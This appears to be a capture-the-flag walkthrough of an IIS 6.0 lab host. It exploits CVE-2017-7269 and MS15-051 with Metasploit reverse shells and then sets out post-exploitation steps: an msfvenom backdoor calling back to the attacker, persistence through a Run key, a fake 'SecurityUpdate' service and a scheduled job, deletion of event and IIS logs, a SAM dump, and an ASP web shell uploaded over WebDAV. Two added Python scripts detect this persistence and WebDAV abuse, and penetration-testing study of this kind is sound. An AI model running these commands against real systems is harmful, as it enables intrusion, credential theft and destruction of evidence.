Machine Synopsis
Key Exploitation Techniques:
- IIS 6.0 WebDAV enumeration and vulnerability identification
- CVE-2017-7269 buffer overflow exploitation
- Windows local privilege escalation (MS15-051)
- WebDAV method abuse for initial access
Reconnaissance & Enumeration
Port Discovery
$ nmap -p- --min-rate 10000 10.10.10.14
PORT   STATE SERVICE
80/tcp open  http
Service Enumeration
$ nmap -p 80 -sC -sV 10.10.10.14
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
WebDAV Enumeration
# Test WebDAV functionality
$ davtest -url http://10.10.10.14
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.14
********************************************************
NOTE Random string for this session: aYYO9mgh
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.14/DavTestDir_aYYO9mgh
********************************************************
Sending test files
PUT txt SUCCEED: http://10.10.10.14/DavTestDir_aYYO9mgh/davtest_aYYO9mgh.txt
PUT aspx FAIL
PUT asp FAIL
PUT html SUCCEED: http://10.10.10.14/DavTestDir_aYYO9mgh/davtest_aYYO9mgh.html
Exploitation
CVE-2017-7269 Buffer Overflow
IIS 6.0 with WebDAV enabled is vulnerable to a stack buffer overflow in the ScStoragePathFromUrl function of the WebDAV component (httpext.dll), triggered by an over-long resource URL in the If header of a PROPFIND request. Only IIS 6.0 on Windows Server 2003 is affected, and that platform was already out of extended support when the bug was disclosed in 2017, so disabling the WebDAV web service extension is the practical mitigation; the nmap http-webdav-scan output above shows it is enabled on this host.
$ msfconsole -q
msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show info
Name: Microsoft IIS WebDAV ScStoragePathFromUrl Overflow
Module: exploit/windows/iis/iis_webdav_scstoragepathfromurl
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.3
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > check
[+] 10.10.10.14:80 - The target is vulnerable.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] 10.10.10.14:80 - Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.14:1030)
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > sysinfo
Computer        : GRANPA
OS              : Windows .NET Server (5.2 Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > shell
Process 2156 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
Privilege Escalation
Local Exploit Enumeration
meterpreter > run post/multi/recon/local_exploit_suggester
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
MS15-051 Exploitation
meterpreter > background
[*] Backgrounding session 1...
msf6 > use exploit/windows/local/ms15_051_client_copy_image
msf6 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1
msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.3
msf6 exploit(windows/local/ms15_051_client_copy_image) > exploit
[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Launching notepad to host the exploit...
[+] Process 2548 launched.
[*] Reflectively injecting the exploit DLL into 2548...
[*] Injecting exploit into 2548...
[*] Exploit injected. Injecting payload into 2548...
[*] Payload injected. Executing exploit...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.3:4444 -> 10.10.10.14:1032)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Flag Collection
meterpreter > shell
Process 2548 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32> whoami
nt authority\system
C:\WINDOWS\system32> cd "C:\Documents and Settings\Harry\Desktop"
C:\Documents and Settings\Harry\Desktop> type user.txt
bdff5ec67c3cff017f2bedc146a5d869
C:\Documents and Settings\Harry\Desktop> cd "C:\Documents and Settings\Administrator\Desktop"
C:\Documents and Settings\Administrator\Desktop> type root.txt
9359e905a2c35f861f6a57cecf28bb7b
Post-Exploitation Techniques
Persistence Methods
Registry Persistence
# Create payload for persistence
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=5555 -f exe -o backdoor.exe
# Transfer via Meterpreter
meterpreter > upload backdoor.exe C:\\WINDOWS\\system32\\backdoor.exe
# Add registry auto-start entry
C:\WINDOWS\system32> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\WINDOWS\system32\backdoor.exe"
# Verify persistence
C:\WINDOWS\system32> reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Service Installation
# Create persistent service
C:\WINDOWS\system32> sc create "SecurityUpdate" binpath= "C:\WINDOWS\system32\backdoor.exe" start= auto
[SC] CreateService SUCCESS
C:\WINDOWS\system32> sc start "SecurityUpdate"
[SC] StartService SUCCESS
# Setup handler for backdoor connections
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.3
msf6 exploit(multi/handler) > set LPORT 5555
msf6 exploit(multi/handler) > exploit
Scheduled Task (Windows 2003)
# Create scheduled task using AT command (Windows 2003)
C:\WINDOWS\system32> at 15:00 /every:M,T,W,Th,F,S,Su "C:\WINDOWS\system32\backdoor.exe"
Added a new job with job ID = 1
# List scheduled tasks
C:\WINDOWS\system32> at
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Each M T W Th F S Su    3:00 PM       C:\WINDOWS\system32\backdoor.exe
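A defender-side check for the three persistence mechanisms above (Run key, auto-start service, at job): an added Python example, not from the original write-up, that parses the output of the same reg query, at and wmic service get commands and reports every autostart whose executable is not in a baseline. The command outputs and the baseline set are constructed for the example.

```python
import re

# Baseline of autostart executables approved for this host (constructed; export it from a clean build in practice)
BASELINE = {r"c:\windows\system32\svchost.exe", r"c:\program files\vmware\vmware tools\vmwaretray.exe"}

def exe_path(command):
    """Reduce a command line to its executable path, lower-cased, ignoring quotes and arguments."""
    m = re.match(r'\s*"?(.+?\.(?:exe|bat|cmd|vbs))\b', command, re.IGNORECASE)
    return m.group(1).lower() if m else command.strip().lower()

def reg_run_entries(text):
    """Parse 'reg query HKLM\\...\\Run' output lines of the form: <name> <REG_type> <data>."""
    return [("run-key", m.group(1), m.group(3).strip())
            for m in map(lambda l: re.match(r"^\s+(.+?)\s+(REG_\w+)\s+(.+)$", l), text.splitlines()) if m]

def at_jobs(text):
    """Parse 'at' output: job id, then day/time columns, then the command line as the last column."""
    return [("at-job", "job " + m.group(1), m.group(2).strip())
            for m in map(lambda l: re.match(r"\s*(?:\S+\s+)?(\d+)\s+.+?\s+\d{1,2}:\d{2} [AP]M\s+(.+)$", l), text.splitlines()) if m]

def wmic_services(text):
    """Parse 'wmic service get name,displayname,pathname,startmode' (columns padded with 2+ spaces); keep Auto-start ones."""
    out = []
    for line in text.splitlines():
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) == 4 and cols[3].lower() == "auto":
            out.append(("service", cols[0], cols[2]))
    return out

def audit(reg_text, at_text, wmic_text, baseline=BASELINE):
    """Return (kind, name, command) for every autostart whose executable is not in the baseline."""
    entries = reg_run_entries(reg_text) + at_jobs(at_text) + wmic_services(wmic_text)
    return [e for e in entries if exe_path(e[2]) not in baseline]

# Constructed command outputs mirroring the persistence entries created above
REG_OUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    SecurityUpdate    REG_SZ    C:\WINDOWS\system32\backdoor.exe
"""
AT_OUT = r"""
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Each M T W Th F S Su    3:00 PM       C:\WINDOWS\system32\backdoor.exe
"""
WMIC_OUT = r"""
Name            DisplayName   PathName                                         StartMode
SecurityUpdate  SecurityUpdate  C:\WINDOWS\system32\backdoor.exe               Auto
W32Time         Windows Time  C:\WINDOWS\system32\svchost.exe -k LocalService  Auto
"""
```

Calling audit(REG_OUT, AT_OUT, WMIC_OUT) returns the three backdoor.exe entries and nothing else; the name "SecurityUpdate" is exactly the kind of plausible label a baseline comparison catches where a name-based review would not.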
Defense Evasion
Log Cleanup
# Clear Windows Event Logs with wevtutil (wevtutil ships with Vista/Server 2008 and later; it does not exist on Windows 2003, so this loop fails there)
C:\WINDOWS\system32> for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
# Windows 2003 alternative: delete the .evt files directly (on a running system the Event Log service holds these files open and the deletion is refused)
C:\WINDOWS\system32> del "C:\WINDOWS\system32\config\*.evt"
# Clear IIS logs (W3SVC1 is the log directory of the default web site)
C:\WINDOWS\system32> del "C:\WINDOWS\system32\LogFiles\W3SVC1\*.log"
File Attribute Manipulation
# Hide backdoor files
C:\WINDOWS\system32> attrib +h +s +r C:\WINDOWS\system32\backdoor.exe
# Note: this overwrites backdoor.exe with a copy of cmd.exe; it replaces the file contents rather than altering its timestamps
C:\WINDOWS\system32> copy /y C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\backdoor.exe
Lateral Movement Preparation
Network Discovery
# Discover network hosts
C:\WINDOWS\system32> for /L %i in (1,1,254) do @ping -n 1 -w 200 10.10.10.%i | findstr "Reply"
# Port scanning with telnet
C:\WINDOWS\system32> telnet 10.10.10.1 80
C:\WINDOWS\system32> telnet 10.10.10.1 443
Credential Harvesting
# Dump SAM database
C:\WINDOWS\system32> reg save HKLM\SAM C:\WINDOWS\Temp\sam
C:\WINDOWS\system32> reg save HKLM\SYSTEM C:\WINDOWS\Temp\system
# Search for stored credentials
C:\WINDOWS\system32> dir /s /b C:\ | findstr /i password
C:\WINDOWS\system32> dir /s /b C:\ | findstr /i config
Service Enumeration
# List running services
C:\WINDOWS\system32> net start
# Query specific services
C:\WINDOWS\system32> sc query state= all | findstr "SERVICE_NAME"
# Check for vulnerable services
C:\WINDOWS\system32> wmic service get name,displayname,pathname,startmode | findstr /i "auto"
Alternative Exploitation Methods
Manual WebDAV Exploitation
# Manual buffer overflow using curl
$ curl -X PROPFIND "http://10.10.10.14/" -H "Content-Type: text/xml" -d '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>' -H "Content-Length: 0" -H "If: <http://10.10.10.14:80/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> (Not <locktoken:write1>)" -v
WebDAV File Upload Exploitation
# Upload ASP shell via WebDAV MOVE method
$ cat > shell.txt << 'EOF'
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c " & Request.QueryString("cmd"))
o = cmd.StdOut.Readall()
Response.write(o)
%>
EOF
# Upload and rename
$ curl -X PUT "http://10.10.10.14/shell.txt" -d @shell.txt
$ curl -X MOVE "http://10.10.10.14/shell.txt" -H "Destination: http://10.10.10.14/shell.asp"
# Execute commands
$ curl "http://10.10.10.14/shell.asp?cmd=whoami"
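A defender-side counterpart to the WebDAV enumeration, the PROPFIND exploit and the upload-and-rename web shell shown in this write-up: an added Python example, not from the original post, that triages IIS 6 W3C log lines for exactly those patterns (successful write methods, davtest's default names, a script fetched with a query string after the same client wrote that base name, and PROPFIND bursts like the exploit module's path-length probing). The log lines, user-agent strings and thresholds are constructed; the #Fields: order is the IIS 6 default field set as assumed here.

```python
import re
from collections import defaultdict
from datetime import datetime

WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY", "DELETE", "PROPPATCH"}
SCRIPT_EXT = re.compile(r"\.(asp|aspx|asa|cer|cdx)$", re.IGNORECASE)
PROPFIND_BURST, BURST_WINDOW = 20, 60   # N PROPFINDs from one client inside this many seconds

def parse_w3c(text):
    """Yield one dict per request line; column names come from the '#Fields:' header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def triage(text):
    """Return sorted (client_ip, rule, detail) findings for WebDAV abuse patterns."""
    findings, propfinds, written = set(), defaultdict(list), defaultdict(set)
    for r in parse_w3c(text):
        ip, method, uri, status = r["c-ip"], r["cs-method"], r["cs-uri-stem"], r["sc-status"]
        base = uri.rsplit(".", 1)[0].lower()
        if method in WRITE_METHODS and status.startswith("2"):      # write method actually succeeded
            findings.add((ip, "webdav-write", f"{method} {uri} -> {status}"))
            written[ip].add(base)
        if uri.startswith("/DavTestDir_") or "davtest_" in uri:     # davtest's default names
            findings.add((ip, "davtest-scan", uri))
        if method == "PROPFIND":
            propfinds[ip].append(datetime.strptime(r["date"] + " " + r["time"], "%Y-%m-%d %H:%M:%S"))
        # a script fetched with a query string whose base name this client wrote or renamed earlier
        if method in ("GET", "POST") and SCRIPT_EXT.search(uri) and r["cs-uri-query"] != "-" and base in written[ip]:
            findings.add((ip, "webshell-use", f"{uri}?{r['cs-uri-query']}"))
    for ip, times in propfinds.items():                              # sliding window over PROPFIND timestamps
        times.sort()
        for i in range(len(times) - PROPFIND_BURST + 1):
            if (times[i + PROPFIND_BURST - 1] - times[i]).total_seconds() <= BURST_WINDOW:
                findings.add((ip, "propfind-burst", f"{PROPFIND_BURST}+ PROPFIND within {BURST_WINDOW}s"))
                break
    return sorted(findings)

# Constructed sample log; the generated PROPFIND lines mimic the path-length probing in the exploit output above
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2017-04-20 10:00:01 10.10.10.14 GET / - 80 - 10.10.10.50 Mozilla/4.0 200 0 0
2017-04-20 10:00:02 10.10.10.14 MKCOL /DavTestDir_aYYO9mgh - 80 - 10.10.14.3 DAV.pm/v1.0 201 0 0
2017-04-20 10:01:10 10.10.10.14 PUT /shell.txt - 80 - 10.10.14.3 curl/7.74.0 201 0 0
2017-04-20 10:01:11 10.10.10.14 MOVE /shell.txt - 80 - 10.10.14.3 curl/7.74.0 201 0 0
2017-04-20 10:01:12 10.10.10.14 GET /shell.asp cmd=whoami 80 - 10.10.14.3 curl/7.74.0 200 0 0
""" + "".join(f"2017-04-20 10:02:{s:02d} 10.10.10.14 PROPFIND / - 80 - 10.10.14.3 Mozilla/4.0 207 0 0\n" for s in range(25))
```

Calling triage(SAMPLE_LOG) reports all four rules for 10.10.14.3 and nothing for the benign client; on a real host the input is the exYYMMDD.log files under the W3SVC1 directory that the log-cleanup section deletes, which is the argument for forwarding them off the box as they are written.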